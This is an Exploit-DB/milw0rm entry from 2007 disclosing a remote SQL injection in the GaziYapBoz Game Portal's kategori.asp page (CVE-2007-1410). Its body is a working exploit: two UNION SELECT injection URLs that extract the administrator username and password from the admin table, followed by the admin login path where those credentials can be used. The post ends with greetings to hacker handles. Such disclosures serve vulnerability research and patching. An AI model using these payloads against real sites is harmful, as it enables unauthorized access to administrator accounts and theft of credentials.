GaziYapBoz Game Portal kategori.asp Remote SQL Injection Vuln

2007-03-08T00:00:00
ID EDB-ID:3437
Type exploitdb
Reporter CyberGhost
Modified 2007-03-08T00:00:00

Description

GaziYapBoz Game Portal (kategori.asp) Remote SQL Injection Vuln. CVE-2007-1410. Webapps exploit for asp platform

                                        
                                            #Title  : GaziYapBoz Game Portal Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://ucgenportal.somee.com/scriptler/gaziyapboz
#Download : http://www.aspindir.com/indir.asp?id=4765&sIslem=%DDndir

Vuln.

Username : /kategori.asp?kategori='+union+select+0,1,2,3,name,5,6,7,8,9+from+admin
Password : /kategori.asp?kategori='+union+select+0,1,2,3,password,5,6,7,8,9+from+admin

Login : /personelgirisizni.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - by_emR3 - kerem125 - Bolivar - Voltigore - CyberDefacer - ProfeSSionaL

And All TURKISH HACKERS

# milw0rm.com [2007-03-08]